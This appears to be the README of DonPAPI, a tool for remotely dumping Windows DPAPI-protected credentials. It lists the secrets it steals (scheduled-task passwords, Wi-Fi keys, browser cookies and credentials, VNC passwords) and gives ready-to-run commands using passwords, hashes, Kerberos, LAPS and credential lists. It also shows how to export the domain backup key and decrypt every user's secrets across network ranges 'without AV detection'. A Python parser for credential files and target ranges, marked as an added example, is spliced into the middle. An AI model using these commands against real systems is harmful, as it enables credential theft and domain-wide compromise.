DonPAPI : Dumping DPAPI Credential Remotely

Dumping relevant information on compromised targets without AV detection.

DPAPI dumping

Lots of credentials are protected by DPAPI.

We aim to locate those "secured" credentials and retrieve them using:

  • the user's password
  • the domain DPAPI backup key
  • the local machine DPAPI key (which protects scheduled-task blobs)

Currently gathered info

  • Windows credentials (scheduled-task credentials and much more)
  • Windows Vaults
  • Windows RDP credentials
  • AD Connect (still requires a manual step)
  • Wi-Fi keys
  • Internet Explorer credentials
  • Chrome cookies and credentials
  • Firefox cookies and credentials
  • VNC passwords
  • mRemoteNG passwords (with the default config)

Operational use

With a local admin account on a host, we can:

  • Gather machine-protected DPAPI secrets:
    • scheduled tasks, whose blobs contain the cleartext login/password of the account configured to run the task
    • Wi-Fi passwords
  • Extract the master key hash for every user profile (master keys are protected by the user's password, so we can try to crack them with Hashcat)
  • Identify who is connected from where, in order to find the admins' personal computers
  • Extract other, non-DPAPI-protected secrets (VNC/Firefox/mRemoteNG)
  • Gather protected secrets from IE, Chrome, and Firefox and start reaching the Azure tenant

With a user's password, or the domain PVK, we can unprotect that user's DPAPI secrets.

Usage

Dump all secrets of the target machine with an admin account:

DonPAPI.py domain/user:password@target

Using the user's hash:

DonPAPI.py --hashes <LM>:<NT> domain/user@target

Using Kerberos (-k) or local authentication (-local_auth):

DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target

Using a user with LAPS password reading rights:

DonPAPI.py -laps domain/user:password@target

It is also possible to provide the tool with a list of credentials that will be tested on the target; DonPAPI will try each of them to decrypt the master keys.

This credential file must have the following syntax:

user1:pass1
user2:pass2
...

DonPAPI.py -credz credz_file.txt domain/user:password@target

When a domain admin account is available, the domain backup key can be dumped with Impacket's dpapi.py tool:

dpapi.py backupkeys --export -t domain/user:password@target_dc_ip

This backup key (PVK file) can then be used to dump every domain user's secrets:

python DonPAPI.py -pvk domain_backupkey.pvk domain/user:password@target_network_list

The target can be a single IP, an IP range, a CIDR block, or a file containing a list of targets (one per line).
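As an added example (not DonPAPI's own code), a small parser for the two input formats described above: the user:pass credential file and the target specification. It assumes ranges are written as start-end and that '#' lines are comments; a password containing ':' is kept intact by splitting on the first colon only.

```python
import ipaddress
from pathlib import Path


def parse_credz(text: str) -> list[tuple[str, str]]:
    """Parse the user:pass credential file format.

    Splits on the first ':' only, so passwords containing ':' survive.
    Blank lines and '#' comments are skipped (an assumption; the
    documented format only shows user:pass lines).
    """
    creds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"malformed credential line: {line!r}")
        user, password = line.split(":", 1)
        creds.append((user, password))
    return creds


def expand_targets(spec: str) -> list[str]:
    """Expand a target spec into individual IPs.

    Accepts a single IP, a CIDR block, a start-end range (assumed
    syntax) or a file with one spec per line; recursion handles files.
    """
    spec = spec.strip()
    if Path(spec).is_file():
        out = []
        for line in Path(spec).read_text().splitlines():
            if line.strip():
                out.extend(expand_targets(line))
        return out
    if "/" in spec:
        net = ipaddress.ip_network(spec, strict=False)
        return [str(h) for h in net.hosts()]
    if "-" in spec:
        start, end = (ipaddress.ip_address(p.strip()) for p in spec.split("-", 1))
        return [str(ipaddress.ip_address(i)) for i in range(int(start), int(end) + 1)]
    return [str(ipaddress.ip_address(spec))]  # validates a single address


if __name__ == "__main__":
    # Constructed sample input, not data from any real engagement.
    print(parse_credz("user1:pass1\nuser2:p:a:ss\n"))
    print(expand_targets("10.0.0.0/30"), expand_targets("10.0.0.5-10.0.0.7"))
```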

Installation

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry install
poetry run donpapi

or

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py
